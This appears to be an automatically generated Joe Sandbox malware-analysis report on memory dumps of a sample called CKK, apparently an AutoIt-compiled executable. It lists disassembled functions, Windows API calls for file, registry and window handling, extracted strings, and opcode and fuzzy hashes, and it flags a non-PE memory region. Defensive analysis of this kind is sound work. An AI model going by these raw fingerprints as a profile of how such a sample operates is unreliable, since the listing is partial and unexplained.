Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime
API String ID: 2086374402-595813830
Opcode ID: b051fdb4ec7ba35d02a640eaa0c150f37834c532152752b332cabece67120a70
Instruction ID: 00d6027a1312ac947b9851c32e2591fcb2d065c840937d31521f3c81706d035b
Opcode Fuzzy Hash: b051fdb4ec7ba35d02a640eaa0c150f37834c532152752b332cabece67120a70
Instruction Fuzzy Hash: EFE0E531B40328BBDB10EBA8AD02EBEBBE0EF45B60B400169F8055F651CD714E419BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00A109D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00A109DA

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 31563eb84b1d2bfac95a4a17bbed67b1ece78b69e3c19f520368ddffce529252
Instruction ID: 753217053185706b72aa37459285e5d86b19427790ed16fe9c29151accaf1c2c
Opcode Fuzzy Hash: 31563eb84b1d2bfac95a4a17bbed67b1ece78b69e3c19f520368ddffce529252
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 009FD730 Relevance: 21.6, APIs: 14, Instructions: 617windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009FD807
timeGetTime.WINMM ref: 009FDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009FDB28
TranslateMessage.USER32(?), ref: 009FDB7B
DispatchMessageW.USER32(?), ref: 009FDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009FDB9F
Sleep.KERNEL32(0000000A), ref: 009FDBB1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 4c4d715b90e59f9be59e78b411cf5c6ad7f90cc1fbf6910177655deb80dd3a25
Instruction ID: bdd140cfaacd9c9f1bf8169563d8ebb23663976e278653c774d8d2f6b1c7305d
Opcode Fuzzy Hash: 4c4d715b90e59f9be59e78b411cf5c6ad7f90cc1fbf6910177655deb80dd3a25
Instruction Fuzzy Hash: D042123060934ADFD728CF24C884B7AB7E6BF85314F54892DF69587291C774E885CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009F2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 009F2D07
RegisterClassExW.USER32(00000030), ref: 009F2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F2D42
InitCommonControlsEx.COMCTL32(?), ref: 009F2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F2D6F
LoadIconW.USER32 ref: 009F2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F2D94

Strings

AutoIt v3 GUI, xrefs: 009F2D23
+, xrefs: 009F2CF0
TaskbarCreated, xrefs: 009F2D37
0, xrefs: 009F2CE9

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 090a1b26a9c76f30a856347717e3d00513d75bfb38ca47b1afb06f50ae887bdc
Instruction ID: 4c66216abdcf3fe4cc48893dfb5b1464a92f7487059917705d8825c53d9ddb05
Opcode Fuzzy Hash: 090a1b26a9c76f30a856347717e3d00513d75bfb38ca47b1afb06f50ae887bdc
Instruction Fuzzy Hash: F221C2B5A01318AFDB00DFE4EC89BDDBBB4FB09714F10811AFA11A62A1D7B14546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A3065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A3039A: CreateFileW.KERNELBASE(00000000,00000000,?,00A30704,?,?,00000000), ref: 00A303B7

GetLastError.KERNEL32 ref: 00A3076F
__dosmaperr.LIBCMT ref: 00A30776
GetFileType.KERNELBASE ref: 00A30782
GetLastError.KERNEL32 ref: 00A3078C
__dosmaperr.LIBCMT ref: 00A30795
CloseHandle.KERNEL32(00000000), ref: 00A307B5
CloseHandle.KERNEL32(?), ref: 00A308FF
GetLastError.KERNEL32 ref: 00A30931
__dosmaperr.LIBCMT ref: 00A30938

Strings

H, xrefs: 00A308BD

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 864c29d28a88e06ff01167997cddd63d5ade5bc6f390f1b5e8915a481c391c32
Instruction ID: 035e991010829cc2ecffa6eeab3835f4e2c089db20e232b835d28b48f626363b
Opcode Fuzzy Hash: 864c29d28a88e06ff01167997cddd63d5ade5bc6f390f1b5e8915a481c391c32
Instruction Fuzzy Hash: 3DA10232A041488FDF19EFB8D862FAE7BA0EB06320F14015DF8259F291DB359953CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009F3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AC1418,?,009F2E7F,?,?,?,00000000), ref: 009F3A78

Part of subcall function 009F3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009F3379

RegOpenKeyExW.KERNEL32 ref: 009F356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A3318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00A331CE
RegCloseKey.ADVAPI32(?), ref: 00A33210
_wcslen.LIBCMT ref: 00A33277
_wcslen.LIBCMT ref: 00A33286

Strings

Software\AutoIt v3\AutoIt, xrefs: 009F3560
\Include\, xrefs: 009F3527
Include, xrefs: 00A33184, 00A331C5
\, xrefs: 00A3328C

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 3bb670d8d1574d43e552ba86be1839a02ce902e8957739cec068b8720e5b3479
Instruction ID: bc92d0a379e2461741a929da6895f0ef01d67efd52dbad8f474b4d833593c8b9
Opcode Fuzzy Hash: 3bb670d8d1574d43e552ba86be1839a02ce902e8957739cec068b8720e5b3479
Instruction Fuzzy Hash: 5271C2714083449EC714EFA5DC81EABBBE8FFD4340F41092EF5459B2A0EB749A49CB62

Uniqueness

Uniqueness Score: -1.00%

Function 009F2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 009F2B8E
LoadCursorW.USER32 ref: 009F2B9D
LoadIconW.USER32 ref: 009F2BB3
LoadIconW.USER32 ref: 009F2BC5
LoadIconW.USER32 ref: 009F2BD7
LoadImageW.USER32 ref: 009F2BEF
RegisterClassExW.USER32(?), ref: 009F2C40

Part of subcall function 009F2CD4: GetSysColorBrush.USER32 ref: 009F2D07
Part of subcall function 009F2CD4: RegisterClassExW.USER32(00000030), ref: 009F2D31
Part of subcall function 009F2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F2D42
Part of subcall function 009F2CD4: InitCommonControlsEx.COMCTL32(?), ref: 009F2D5F
Part of subcall function 009F2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F2D6F
Part of subcall function 009F2CD4: LoadIconW.USER32 ref: 009F2D85
Part of subcall function 009F2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F2D94

Strings

0, xrefs: 009F2C0F
AutoIt v3, xrefs: 009F2C2F
#, xrefs: 009F2C16

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 058d1d988e57968e859013d3c5213bbcbd69adcee553262ba6d86ded04fc1b9d
Instruction ID: 5b0912aed28d1243c23b53fe5e619b1ae0524bd9bd689362c3f2a42929efcb5f
Opcode Fuzzy Hash: 058d1d988e57968e859013d3c5213bbcbd69adcee553262ba6d86ded04fc1b9d
Instruction Fuzzy Hash: B4213870E00358ABDB50DFE5EC49FAA7FB4FB49B58F01001AEA00AA7A1D3B54552CF90

Uniqueness

Uniqueness Score: -1.00%

Function 009F3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,009F316A,?,?), ref: 009F31D8
KillTimer.USER32 ref: 009F3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009F3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,009F316A,?,?), ref: 009F3232
CreatePopupMenu.USER32 ref: 009F3246
PostQuitMessage.USER32 ref: 009F3267

Strings

TaskbarCreated, xrefs: 009F322D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 07e3008fb2f11e2e50fef7a1514c971baf5e1c33e72bb4db39468ae87d546d1d
Instruction ID: f56b087bf01bb2ac15d45523d3514a3b5c90574ba39efeba7af11e707cde085f
Opcode Fuzzy Hash: 07e3008fb2f11e2e50fef7a1514c971baf5e1c33e72bb4db39468ae87d546d1d
Instruction Fuzzy Hash: 17417C3530420CE7DF14ABB89D0DFB93A19F746354F04811AFB1286292DB7DCE4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A28D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 906ab4a7190dc4c9dc5ebf4bb01b04f8d79000f09ad33d993f1534df2a94717b
Instruction ID: b8c08712fbf00c2756f6dbb11065d10cccd75ae10c04dd55fc3f167660ec54fe
Opcode Fuzzy Hash: 906ab4a7190dc4c9dc5ebf4bb01b04f8d79000f09ad33d993f1534df2a94717b
Instruction Fuzzy Hash: 54C1D375E08269AFDB11DFACE941BEEBBB0BF09310F044069F515A7392CB349942CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00190920 Relevance: 10.7, APIs: 7, Instructions: 185
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00190965

Memory Dump Source

Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_CKK.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
Instruction ID: 3fc970e655ad4dcf05aa7f8ecf5b36a8a7a7b74dae55fcc372fc7fb2c2995a5e
Opcode Fuzzy Hash: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
Instruction Fuzzy Hash: FA71C675A10208EFDF24DFA4CC85FEEB7B5AF48704F108558F606AB280DB74AA44DB64

Uniqueness

Uniqueness Score: -1.00%

Function 009F2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 009F2C91
CreateWindowExW.USER32 ref: 009F2CB2
ShowWindow.USER32(00000000), ref: 009F2CC6
ShowWindow.USER32(00000000), ref: 009F2CCF

Strings

edit, xrefs: 009F2CAC
AutoIt v3, xrefs: 009F2C89, 009F2C8E, 009F2C8F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 82f07e83cf8aee607d30b23be9f99a8232f67d693e618d2a613ab42dc92d165e
Instruction ID: 8a14962d6a53a7f1ff034268abc3e9b5330faa49001dba2c37900067aafc8d79
Opcode Fuzzy Hash: 82f07e83cf8aee607d30b23be9f99a8232f67d693e618d2a613ab42dc92d165e
Instruction Fuzzy Hash: EAF03A796402D07AEB709793AC0CE773EBDD7C7F64B02005AF900AA6A1D2710852DEB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A261FE Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A182D9,00A182D9,?,?,?,00A2644F,00000001,00000001,8BE85006), ref: 00A26258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A2644F,00000001,00000001,8BE85006,?,?,?), ref: 00A262DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A263D8
__freea.LIBCMT ref: 00A263E5

Part of subcall function 00A23820: RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852

__freea.LIBCMT ref: 00A263EE
__freea.LIBCMT ref: 00A26413

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 86f2316d648e739f243072423bda413dab1c76f7a05cd9a114afa6989c0d4c46
Instruction ID: 6807046d0889ccf56cd4d24bafc87114235b2beba00fc9d50479a89fcf4bed32
Opcode Fuzzy Hash: 86f2316d648e739f243072423bda413dab1c76f7a05cd9a114afa6989c0d4c46
Instruction Fuzzy Hash: 6E51D172A01226ABEF259F68ED81EAF77A9EF44750F154679FC05DA180DB34DC40C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A62947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A62C05
DeleteFileW.KERNEL32(?), ref: 00A62C87
CopyFileW.KERNEL32 ref: 00A62C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A62CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A62CC0

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 4f0a0255c6955370a6ec335deef95f71598dbea6fb2c37ca2945b43f7ddd38c6
Instruction ID: 8691d87c21b8d925f8a343e37d6d41f83895f096a84165e9862e45bae8e509ed
Opcode Fuzzy Hash: 4f0a0255c6955370a6ec335deef95f71598dbea6fb2c37ca2945b43f7ddd38c6
Instruction Fuzzy Hash: 0BB12C72D0051DABDF21EBA4CD85FEEBBBDEF49350F1040A6F609E6151EA309A448F61

Uniqueness

Uniqueness Score: -1.00%

Function 00192440 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00192330: Sleep.KERNELBASE(000001F4), ref: 00192341

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0019254B

Strings

J4XZWXL54J4661J, xrefs: 001925CB, 001925CE

Memory Dump Source

Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_CKK.jbxd

Similarity

API ID: CreateFileSleep
String ID: J4XZWXL54J4661J
API String ID: 2694422964-1089018925
Opcode ID: 6f2a21149c649fb9989fcdc149a11f9c503cf28596870597020a0efb808fa96e
Instruction ID: e55cffaf80794526fad9be0cbe959355fc79f016ca202a63d9e252da2be1232c
Opcode Fuzzy Hash: 6f2a21149c649fb9989fcdc149a11f9c503cf28596870597020a0efb808fa96e
Instruction Fuzzy Hash: B2518331D14249EBEF15DBA4C815BEFBB78AF59300F108199E608BB2C0D7791B49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 009F3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 009F3B40
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 009F3B61
RegCloseKey.ADVAPI32(00000000), ref: 009F3B83

Strings

Control Panel\Mouse, xrefs: 009F3B3E

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e739af615b28a1b25279c07b75e09261fca5c96a735b51b86b6ebf9cdc5b07bd
Instruction ID: 6285c50b590172289a5eae599e0e62ae59f4dff9b4c87253fb563c84283e261c
Opcode Fuzzy Hash: e739af615b28a1b25279c07b75e09261fca5c96a735b51b86b6ebf9cdc5b07bd
Instruction Fuzzy Hash: 10115AB1511208FFDB20CFA4DC44ABEB7BCEF00791B10895AA901D7110E2359E419B60

Uniqueness

Uniqueness Score: -1.00%

Function 009FDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00A432B7

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 5dc0d799862403ca0d7b9d2f27f034fdfbe75060867aabac9a8adc326a956d4d
Instruction ID: a2b526d2b7a95549f59c707093752588730666305fe053f38d9beefffacf7d0d
Opcode Fuzzy Hash: 5dc0d799862403ca0d7b9d2f27f034fdfbe75060867aabac9a8adc326a956d4d
Instruction Fuzzy Hash: CCC28A75A00209CFCB24CF98D884BBDB7B5BF48310F248569EA16AB3A1D775ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A23073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,009F13C6,00000000,00000000,?,00A2301A,009F13C6,00000000,00000000,00000000,?,00A2328B,00000006,FlsSetValue), ref: 00A230A5
GetLastError.KERNEL32(?,00A2301A,009F13C6,00000000,00000000,00000000,?,00A2328B,00000006,FlsSetValue,00A92290,FlsSetValue,00000000,00000364,?,00A22E46), ref: 00A230B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A2301A,009F13C6,00000000,00000000,00000000,?,00A2328B,00000006,FlsSetValue,00A92290,FlsSetValue,00000000), ref: 00A230BF

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
